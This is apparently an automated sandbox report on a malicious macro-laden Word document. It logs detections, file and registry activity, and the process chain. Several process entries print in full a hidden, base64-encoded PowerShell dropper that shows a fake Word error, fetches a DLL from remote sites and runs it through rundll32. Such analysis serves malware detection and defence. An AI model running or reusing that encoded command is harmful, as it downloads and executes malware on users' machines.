OLE indicator, VBA macros: true

Source: 00000005.00000002.2102145547.0000000000246000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2102389615.0000000001CE6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@26/8@7/5

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_002B1C88 CreateToolhelp32Snapshot,

15_2_002B1C88

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,

7_2_10002D70

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$t_513543.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCF30.tmp

Jump to behavior

Source: dat_513543.doc

OLE indicator, Word Document stream: true

Source: dat_513543.doc	OLE document summary: title field not present or empty
Source: dat_513543.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ........................................ .`.......`.............P.#.......#.............#...............................h.......5kU.......#.....	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........#.....L.................#.....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........k.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....`^......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j..... ..............................}..v.....^......0.................k.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................u..j....................................}..v.....k......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................u..j......k.............................}..v....Pl......0...............8.k.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....................................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j..... ..............................}..v............0.................k.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j....E...............................}..v.....:......0.................k.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....+..................j....E...............................}..v.....x......0.................k.............................	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL

Source: dat_513543.doc

Virustotal: Detection: 63%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwmjhjl\dvgjre.ish',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bfafpdt\kkujpl.inf',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Stxynijtatjphar\aakvwlgscnjram.hbh',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oumozqnkirxudf\mcchvdsvabpvx.nrv',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ailact\ivkbd.qrm',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Akjjgl\zoljk.jdx',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Liisdspzre\vtsbueurz.syo',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uwcxnjiedvybvto\cwmcmgelygpijt.aui',Control_RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwmjhjl\dvgjre.ish',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bfafpdt\kkujpl.inf',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Stxynijtatjphar\aakvwlgscnjram.hbh',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oumozqnkirxudf\mcchvdsvabpvx.nrv',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ailact\ivkbd.qrm',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Akjjgl\zoljk.jdx',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Liisdspzre\vtsbueurz.syo',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uwcxnjiedvybvto\cwmcmgelygpijt.aui',Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp
Source:	Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2105242843.0000000002AD0000.00000002.00000001.sdmp
Source:	Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2105471306.0000000002DC7000.00000004.00000040.sdmp

Source: dat_513543.doc

Initial sample: OLE summary subject = Incredible deposit Legacy Shoes Creative CSS Open-source

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: dat_513543.doc	Stream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788			Name: Owppnp8hah4xo788

Obfuscated command line found

Show sources

Source: unknown

